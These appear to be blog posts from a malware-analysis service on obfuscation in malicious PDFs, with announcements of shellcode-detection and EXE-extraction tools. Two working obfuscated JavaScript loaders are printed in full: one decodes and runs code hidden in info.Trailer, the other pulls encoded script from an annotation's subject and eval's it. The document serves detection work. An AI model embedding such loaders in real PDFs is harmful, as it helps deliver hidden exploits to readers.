More fun with PDF Obfuscation

Another interesting way to hide a block of JavaScript inside a PDF, info.Trailer:

exmu='dmw';if(app.alert)exmu='';WmMw=this;zisc=WmMw.info;exmu=exmu+unescape('%')+exmu;y1vw=zisc.Trailer.replace(/([A-Z])/g,exmu);app.setTimeOut(unescape(y1vw),3)

Shellcode Detection Tool

New web tool - paste your hex right from a hex editor into the Decoder Tool and select Detect as shellcode to run a LibEmu detection scan. Also decode various JavaScript obfuscation methods such as charFromCode, unicode, regular hex escaping.

Executable extraction from documents

New feature in beta, extraction of the EXE files and embedded documents. Check the bottom of the report page for a list of embedded files. The MD5's may vary from actual dropped files as any whitespace at the end of the exe's won't be included.

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique. The use of getAnnots and syncAnnotScan to iterate through FlateDecode blocks which contain raw encoded data. Inside the encoded data is usually packed obfuscated JavaScript with some recent exploit.

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s); s = ''; z = 1;